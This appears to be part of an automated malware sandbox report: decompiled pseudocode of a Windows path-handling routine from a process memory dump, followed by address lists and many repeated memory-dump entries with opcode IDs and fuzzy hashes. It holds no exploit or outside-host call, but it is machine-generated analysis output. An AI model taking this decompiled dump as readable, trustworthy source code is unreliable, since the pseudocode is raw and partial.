                                                      													_v580 = _t177;
                                                      													if(_t177 == 0) {
                                                      														L29:
                                                      														_t307 =  *_t321 & 0x0000ffff;
                                                      													} else {
                                                      														_t290 =  *_t321 & 0x0000ffff;
                                                      														_v576 = _t290;
                                                      														_t310 = _t177 & 0x0000ffff;
                                                      														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                      															_t307 =  *_t321 & 0xffff;
                                                      														} else {
                                                      															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                      															E017EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                      															_t329 = _t329 + 0xc;
                                                      															_t311 = _v580;
                                                      															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                      															 *_t321 = _t225;
                                                      															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                      																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      															}
                                                      															goto L29;
                                                      														}
                                                      													}
                                                      													_t271 = _v556 - _v588 + _v588;
                                                      													_v580 = _t307;
                                                      													_v576 = _t271;
                                                      													if(_t271 != 0) {
                                                      														_t308 = _t271 & 0x0000ffff;
                                                      														_v588 = _t308;
                                                      														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                      															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                      															E017EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                      															_t329 = _t329 + 0xc;
                                                      															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                      															 *_t321 = _t213;
                                                      															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                      																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                      															}
                                                      														}
                                                      													}
                                                      													_t272 = _v560;
                                                      													if(_t272 != 0) {
                                                      														 *_t272 = _t321;
                                                      													}
                                                      													_t306 = 0;
                                                      													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      													_t275 = _v572;
                                                      													if(_t275 != 0) {
                                                      														_t306 =  *_t275;
                                                      														if(_t306 != 0) {
                                                      															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                      														}
                                                      													}
                                                      													_t181 = _v544;
                                                      													if(_t181 != 0) {
                                                      														 *_t181 = 0;
                                                      														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                      														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                      														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                      														if(_v540 == 5) {
                                                      															_t182 = E017A52A5(1);
                                                      															_v588 = _t182;
                                                      															if(_t182 == 0) {
                                                      																E017BEB70(1, 0x18979a0);
                                                      																goto L38;
                                                      															} else {
                                                      																_v560 = _t182 + 0xc;
                                                      																_t185 = E017BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                      																if(_t185 == 0) {
                                                      																	_t324 = _v588;
                                                      																	goto L97;
                                                      																} else {
                                                      																	_t306 = _v544;
                                                      																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                      																	 *(_t306 + 4) = _t282;
                                                      																	_v576 = _t282;
                                                      																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                      																	 *_t306 = _t325;
                                                      																	if( *_t282 == 0x5c) {
                                                      																		_t149 = _t325 - 2; // -2
                                                      																		_t283 = _t149;
                                                      																		 *_t306 = _t283;
                                                      																		 *(_t306 + 4) = _v576 + 2;
                                                      																		_t185 = _t283 & 0x0000ffff;
                                                      																	}
                                                      																	_t324 = _v588;
                                                      																	 *(_t306 + 2) = _t185;
                                                      																	if((_v548 & 0x00000002) == 0) {
                                                      																		L97:
                                                      																		asm("lock xadd [esi], eax");
                                                      																		if((_t185 | 0xffffffff) == 0) {
                                                      																			_push( *((intOrPtr*)(_t324 + 4)));
                                                      																			E017E95D0();
                                                      																			L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                      																		}
                                                      																	} else {
                                                      																		 *(_t306 + 0xc) = _t324;
                                                      																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                      																	}
                                                      																	goto L38;
                                                      																}
                                                      															}
                                                      															goto L41;
                                                      														}
                                                      													}
                                                      													L38:
                                                      													_t322 = 0;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      									L39:
                                                      									if(_t254 !=  &_v532) {
                                                      										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                      									}
                                                      									_t169 = _t322;
                                                      								}
                                                      								goto L41;
                                                      							}
                                                      							goto L68;
                                                      						}
                                                      					}
                                                      					L41:
                                                      					_pop(_t317);
                                                      					_pop(_t323);
                                                      					_pop(_t255);
                                                      					return E017EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                      				} else {
                                                      					_t299 = __edx[2];
                                                      					if( *_t299 == 0x5c) {
                                                      						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                      						if(_t256 != 0x5c) {
                                                      							if(_t256 != 0x3f) {
                                                      								goto L2;
                                                      							} else {
                                                      								goto L50;
                                                      							}
                                                      						} else {
                                                      							L50:
                                                      							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                      								goto L2;
                                                      							} else {
                                                      								_t251 = E017E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                      								_pop(_t319);
                                                      								_pop(_t326);
                                                      								_pop(_t257);
                                                      								return E017EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                      							}
                                                      						}
                                                      					} else {
                                                      						L2:
                                                      						_t260 = _v572;
                                                      						goto L3;
                                                      					}
                                                      				}
                                                      				L101:
                                                      			}

                                                      0x017c4280
                                                      0x017c4282
                                                      0x017c4456
                                                      0x017c45ea
                                                      0x00000000
                                                      0x017c45f0
                                                      0x0180e223
                                                      0x00000000
                                                      0x0180e223
                                                      0x017c445c
                                                      0x017c445c
                                                      0x00000000
                                                      0x017c445c
                                                      0x00000000
                                                      0x017c4288
                                                      0x017c428c
                                                      0x0180e298
                                                      0x017c4292
                                                      0x017c4292
                                                      0x017c429e
                                                      0x017c42a3
                                                      0x017c42a7
                                                      0x017c42ac
                                                      0x0180e22d
                                                      0x017c42b2
                                                      0x017c42b2
                                                      0x017c42b9
                                                      0x017c42bc
                                                      0x017c42c2
                                                      0x017c42ca
                                                      0x017c42cd
                                                      0x017c42cd
                                                      0x017c42d4
                                                      0x017c433f
                                                      0x017c433f
                                                      0x017c42d6
                                                      0x017c42d6
                                                      0x017c42d9
                                                      0x017c42dd
                                                      0x017c42eb
                                                      0x0180e23a
                                                      0x017c42f1
                                                      0x017c4305
                                                      0x017c430d
                                                      0x017c4315
                                                      0x017c4318
                                                      0x017c431f
                                                      0x017c4322
                                                      0x017c432e
                                                      0x017c433b
                                                      0x017c433b
                                                      0x00000000
                                                      0x017c432e
                                                      0x017c42eb
                                                      0x017c434c
                                                      0x017c434e
                                                      0x017c4352
                                                      0x017c4359
                                                      0x017c435e
                                                      0x017c4361
                                                      0x017c436e
                                                      0x017c438a
                                                      0x017c438e
                                                      0x017c4396
                                                      0x017c439e
                                                      0x017c43a1
                                                      0x017c43ad
                                                      0x017c43bb
                                                      0x017c43bb
                                                      0x017c43ad
                                                      0x017c436e
                                                      0x017c43bf
                                                      0x017c43c5
                                                      0x017c4463
                                                      0x017c4463
                                                      0x017c43ce
                                                      0x017c43d5
                                                      0x017c43d9
                                                      0x017c43df
                                                      0x017c4475
                                                      0x017c4479
                                                      0x017c4491
                                                      0x017c4491
                                                      0x017c4479
                                                      0x017c43e5
                                                      0x017c43eb
                                                      0x017c43f4
                                                      0x017c43f6
                                                      0x017c43f9
                                                      0x017c43fc
                                                      0x017c43ff
                                                      0x017c44e8
                                                      0x017c44ed
                                                      0x017c44f3
                                                      0x0180e247
                                                      0x00000000
                                                      0x017c44f9
                                                      0x017c4504
                                                      0x017c4508
                                                      0x017c450f
                                                      0x0180e269
                                                      0x00000000
                                                      0x017c4515
                                                      0x017c4519
                                                      0x017c4531
                                                      0x017c4534
                                                      0x017c4537
                                                      0x017c453e
                                                      0x017c4541
                                                      0x017c454a
                                                      0x0180e255
                                                      0x0180e255
                                                      0x0180e25b
                                                      0x0180e25e
                                                      0x0180e261
                                                      0x0180e261
                                                      0x017c4555
                                                      0x017c4559
                                                      0x017c455d
                                                      0x0180e26d
                                                      0x0180e270
                                                      0x0180e274
                                                      0x0180e27a
                                                      0x0180e27d
                                                      0x0180e28e
                                                      0x0180e28e
                                                      0x017c4563
                                                      0x017c4563
                                                      0x017c4569
                                                      0x017c4569
                                                      0x00000000
                                                      0x017c455d
                                                      0x017c450f
                                                      0x00000000
                                                      0x017c44f3
                                                      0x017c43ff
                                                      0x017c4405
                                                      0x017c4405
                                                      0x017c4405
                                                      0x017c42ac
                                                      0x017c428c
                                                      0x017c4282
                                                      0x017c4407
                                                      0x017c440d
                                                      0x0180e2af
                                                      0x0180e2af
                                                      0x017c4413
                                                      0x017c4413
                                                      0x00000000
                                                      0x017c41d4
                                                      0x00000000
                                                      0x017c41c3
                                                      0x017c41bd
                                                      0x017c4415
                                                      0x017c4415
                                                      0x017c4416
                                                      0x017c4417
                                                      0x017c4429
                                                      0x017c416e
                                                      0x017c416e
                                                      0x017c4175
                                                      0x017c4498
                                                      0x017c449f
                                                      0x0180e12d
                                                      0x00000000
                                                      0x0180e133
                                                      0x00000000
                                                      0x0180e133
                                                      0x017c44a5
                                                      0x017c44a5
                                                      0x017c44aa
                                                      0x00000000
                                                      0x017c44bb
                                                      0x017c44ca
                                                      0x017c44d6
                                                      0x017c44d7
                                                      0x017c44d8
                                                      0x017c44e3
                                                      0x017c44e3
                                                      0x017c44aa
                                                      0x017c417b
                                                      0x017c417b
                                                      0x017c417b
                                                      0x00000000
                                                      0x017c417b
                                                      0x017c4175
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 902e7f86be874c3e8f209b01eb2ec58c7f8b0096b88c61f7e9846f3f266653d8
                                                      • Instruction ID: c8208ef1cea5cc6043c73c7c3cfa9802f23942f9c5bbbab25d57425407953e47
                                                      • Opcode Fuzzy Hash: 902e7f86be874c3e8f209b01eb2ec58c7f8b0096b88c61f7e9846f3f266653d8
                                                      • Instruction Fuzzy Hash: 42F17D706082118FD725CF18C8A4A7AFBE1FF98B14F14496EF986CB290E734D981CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6faf9740fcf6a1f2192b7fed782091d297f3222084bd252cb09e7217ab14a39a
                                                      • Instruction ID: 305f2e8f2e04a554a39e42476f40381753d48e38528f32b2a3c36b49d5316ed2
                                                      • Opcode Fuzzy Hash: 6faf9740fcf6a1f2192b7fed782091d297f3222084bd252cb09e7217ab14a39a
                                                      • Instruction Fuzzy Hash: FFF1F2326083499FD726CF2CC84472ABBF6AFC6314F08855DE995CB246D735D942CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f96402bd130d42d4970fa4d830342f8dcfb1fd8588a2c5caf1a7d82d4ff9578b
                                                      • Instruction ID: e1bf17bccc9874c7fef4ac2bd7a228d4c10e0922a250a37d393fce44a5bd6ac9
                                                      • Opcode Fuzzy Hash: f96402bd130d42d4970fa4d830342f8dcfb1fd8588a2c5caf1a7d82d4ff9578b
                                                      • Instruction Fuzzy Hash: 00E1C034A0065A8FEB35CF68C8C4BE9FBB2BF45318F0901E9D90997295D774AA81CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af2a94cfe06781d6fddf28bbd10b66d0ab39ea1f06173b8651e9a36fd36f58d4
                                                      • Instruction ID: 2f4241686d310aef5af1e810deda654aa85fd0930daf801a36544a18a9b0648f
                                                      • Opcode Fuzzy Hash: af2a94cfe06781d6fddf28bbd10b66d0ab39ea1f06173b8651e9a36fd36f58d4
                                                      • Instruction Fuzzy Hash: 4EB13970E0020ADFDB25DF99C998BEDFBB9BF48308F144129E505AB24ADB70A945CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 439d45aac7ed6c0c8959c8ddbf5e13d5b9a30add7e08ce1cf6de158eb59ba5a0
                                                      • Instruction ID: 0fc6d83305f75b0dc490ae32201a41e7001edc539a481c5661913f5641e2e6d4
                                                      • Opcode Fuzzy Hash: 439d45aac7ed6c0c8959c8ddbf5e13d5b9a30add7e08ce1cf6de158eb59ba5a0
                                                      • Instruction Fuzzy Hash: 25C1F0B55093818FD354CF28C580A5AFBF1BF88304F284A6EF9999B352D771E985CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4d3cc09d67fbdac155841967b70981f47e2ffd6b94711880b74a1bf4083ffd2
                                                      • Instruction ID: f5f4bc0a2148ae608ad3d99465286e1b641111f713385dfde5122432dc9cd8bc
                                                      • Opcode Fuzzy Hash: c4d3cc09d67fbdac155841967b70981f47e2ffd6b94711880b74a1bf4083ffd2
                                                      • Instruction Fuzzy Hash: 9C910772E002199FEF229A6CC848FADBBB8AB05724F550265FA11E72D5D7749E40CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d61e1d7817bd969c73dc30fe6874e4f9c26745b56d90cad327e3cfe6ed483a5
                                                      • Instruction ID: 64457cfe60fd247fa28eabba3567e9a6e222e8a70f93bf9c087b198afa71ab58
                                                      • Opcode Fuzzy Hash: 3d61e1d7817bd969c73dc30fe6874e4f9c26745b56d90cad327e3cfe6ed483a5
                                                      • Instruction Fuzzy Hash: 3681B2776042069FDB26CE58C880E6AB7EDFB84354F14485EEE45DB249D730EE44CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cab9272fbb651ff2c8a5f438c5c82775a4c0344a2e2544bd82c4c93456d964e
                                                      • Instruction ID: 03f9e095ab6e467bcbb55af1a21a49035c9876f080ed0be26062567443c69ae5
                                                      • Opcode Fuzzy Hash: 3cab9272fbb651ff2c8a5f438c5c82775a4c0344a2e2544bd82c4c93456d964e
                                                      • Instruction Fuzzy Hash: D871F4B2200B06AFE731CF18C848F56BBE5EB84724F19452CE655D72A1EB75EA41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction ID: bcc9d13781c9e37037803d8dec71bd5dcee70aeb70e0322f68b21a54587bd468
                                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction Fuzzy Hash: 51716E71A00619EFDB11DFA9C984EAEFBB9FF58710F104069E905E7250EB34EA41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f27e82c02bdc3bcf5fd60394ea5e801b244b7820b76fa0fc1382c4be13824df2
                                                      • Instruction ID: 25060e9ac64df629ebf20698cc18166f1deed9572cf93f5f950a90f14740818d
                                                      • Opcode Fuzzy Hash: f27e82c02bdc3bcf5fd60394ea5e801b244b7820b76fa0fc1382c4be13824df2
                                                      • Instruction Fuzzy Hash: 5451D071D4025E8EEB72CF68C848BAEBBF0AF04710F1041ADDA59EB292D7704A41CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a8cc7a87a7da6665aefb977c76f8b25b193d55d765c508b7677e1af7d78c4fe2
                                                      • Instruction ID: 82276dbc8678de53a6751d2a5ac1d66376faf43d2dbcdd838b4dcdf83728a3cd
                                                      • Opcode Fuzzy Hash: a8cc7a87a7da6665aefb977c76f8b25b193d55d765c508b7677e1af7d78c4fe2
                                                      • Instruction Fuzzy Hash: 42514671A08341CFC721CF6DC48592AFBE5BB89B80F14896EFA8587359D731E944CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1045956fa2dc1edb93cbcfe7815b3703f4cb51d3722992b3b125cf16de1a640b
                                                      • Instruction ID: 4f9da6dc2423e5e9c5a7ac1a692305fb74b29b3731084b5d3201eaa41171d65f
                                                      • Opcode Fuzzy Hash: 1045956fa2dc1edb93cbcfe7815b3703f4cb51d3722992b3b125cf16de1a640b
                                                      • Instruction Fuzzy Hash: D551EEB12093469BD722DF68C888B67FBE4FF94710F14091EF59587691EB74E900CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29b76b308e244fa6f328f6a84cdfc503620b944e24420dfad9c563ce70ec3f4f
                                                      • Instruction ID: 072e0bf58341be7685735ffe0cfb032548df484b3457555bf4c8b5399088beb8
                                                      • Opcode Fuzzy Hash: 29b76b308e244fa6f328f6a84cdfc503620b944e24420dfad9c563ce70ec3f4f
                                                      • Instruction Fuzzy Hash: E151A376B001198FCB18CF5CC4909BDF7B1FB89700719849AE856EB366E771AE52CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 862161faf589cbf82ba8d1e152db6e3852f401dc48c82c96179d8828bd4d36c8
                                                      • Instruction ID: afe3928f75832a4089f9805c87dfdb5ae59d7c125ac05de82901adb4dccb08d8
                                                      • Opcode Fuzzy Hash: 862161faf589cbf82ba8d1e152db6e3852f401dc48c82c96179d8828bd4d36c8
                                                      • Instruction Fuzzy Hash: FB41C4B17006159BD72EDA2DC894B3BB7DEAF94720F044219FA16E72D1DB34DA01C792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d3253a8c0f7d9df46cdce69e67f9d6a7ea2e06e880f8e1920ba72b0f69815e83
                                                      • Instruction ID: 898a8a2ba56b854758ca1cacb20efcbe498874acdfc05f0203ae6300b7ea796c
                                                      • Opcode Fuzzy Hash: d3253a8c0f7d9df46cdce69e67f9d6a7ea2e06e880f8e1920ba72b0f69815e83
                                                      • Instruction Fuzzy Hash: 072180B2600109EFC714DF58CD85B9ABBBDFB45708F190068E509AB251D771EE018B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4703210886f501a5b124f310ebf1b6cb8fd07dbc1a0a9db55b21648f72520dc8
                                                      • Instruction ID: 5a15531773b91c4a3cefc70be28b7a8505d278e2df7a2759288f8e646f4504f5
                                                      • Opcode Fuzzy Hash: 4703210886f501a5b124f310ebf1b6cb8fd07dbc1a0a9db55b21648f72520dc8
                                                      • Instruction Fuzzy Hash: 712125724002899BD312DF28C948B67FBECEF91740F18045AFD40C7251EB35CA88C6A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction ID: 250ea9432e4c38f85d0bb2de27003d6223ca9ee5dd11f9b4c3caf65afc8abe66
                                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction Fuzzy Hash: B22146362082049FD705DF1CC884B6ABBA5EFD1350F04852DF995DB385CB30DA09CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1dcc3be420c957d6955c46a250a74d8d827201e14334d58b9f7c3df8ca90d5cf
                                                      • Instruction ID: 71fdfcbd3a86502edf7a19bf8dbf8271fd56f62bdf3981a521d327bbe82a2b48
                                                      • Opcode Fuzzy Hash: 1dcc3be420c957d6955c46a250a74d8d827201e14334d58b9f7c3df8ca90d5cf
                                                      • Instruction Fuzzy Hash: D821DE72900614AFC726DF69D884E6BBBF8EF58740F10016DFA0AD7750D634EA40CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction ID: 34c5e06aa9359a9f868d5963b5b18eef5b5667b2efe8394fe197852a7e5e395d
                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction Fuzzy Hash: A72104726016858FE7169B6CC948B25BBE9EF04B40F2904E8DD04CB296E734DD40CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: 9affe2f3c88bbd89d7f7896ed08eb9fe7ffbe0eb7aca65d8b29041588e4f9552
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: 3F217972640A89DFD735CF0DC540E66FBF5EB98B10F2481AEE94A87619D730AD42CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a781b35d91a89bd54189aabe8a249bcd2837f86004eb43709ae30366ed0fceed
                                                      • Instruction ID: 7cac9358d5b767e33a255a5ea1fe4be479a4257301aef5785ecb2a4a24482433
                                                      • Opcode Fuzzy Hash: a781b35d91a89bd54189aabe8a249bcd2837f86004eb43709ae30366ed0fceed
                                                      • Instruction Fuzzy Hash: EA116B337061199BCB1E8E19CD85A6BB2ABEBC7730B29012DDE16CB380CD319D02C6D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction ID: 5a021578f754197ba7f79f2d3926f784e999b3fa22b21355fd69ec39709e6e2a
                                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction Fuzzy Hash: CFF0FC33241523DBD3335AD9C888F2BFA968FD1A60F550635F2059BB48CE608C0286D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction ID: f6acb8c876693d60d9023400f60d4c0d1f640f7ee5052dbc99c85eb257e96013
                                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction Fuzzy Hash: AF01D1322446849BD323976DC808F69BB99EF91754F0800A6FA14CB6F2DA78D980C615
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5b101352b3eb44be6a349369531d4ef542c66fc63579d2908ea112f63934b41
                                                      • Instruction ID: d7f59865fd611b81b23f70de824edd73d6a7374abc9af05eceee7a70383e48ed
                                                      • Opcode Fuzzy Hash: a5b101352b3eb44be6a349369531d4ef542c66fc63579d2908ea112f63934b41
                                                      • Instruction Fuzzy Hash: D6016271A0020DAFCB14DFA8D546A6EBBF4FF08704F544159B515DB382DA35DA01CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adc9d2cc09825fe5a68e0bd699c301f6a2c88b9c1d21695e10fd244414c10780
                                                      • Instruction ID: 443bae43e577fe47f553493962528de8926a40a6f372296740b681d706ad009c
                                                      • Opcode Fuzzy Hash: adc9d2cc09825fe5a68e0bd699c301f6a2c88b9c1d21695e10fd244414c10780
                                                      • Instruction Fuzzy Hash: 04011D71A01249AFCB04DFA9D549AAEB7F4FF58700F404059F905EB341E6349A40CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a6cf627c5db54dedac08bd34e6ed70161cdde4652852408c7848c6c974659ef
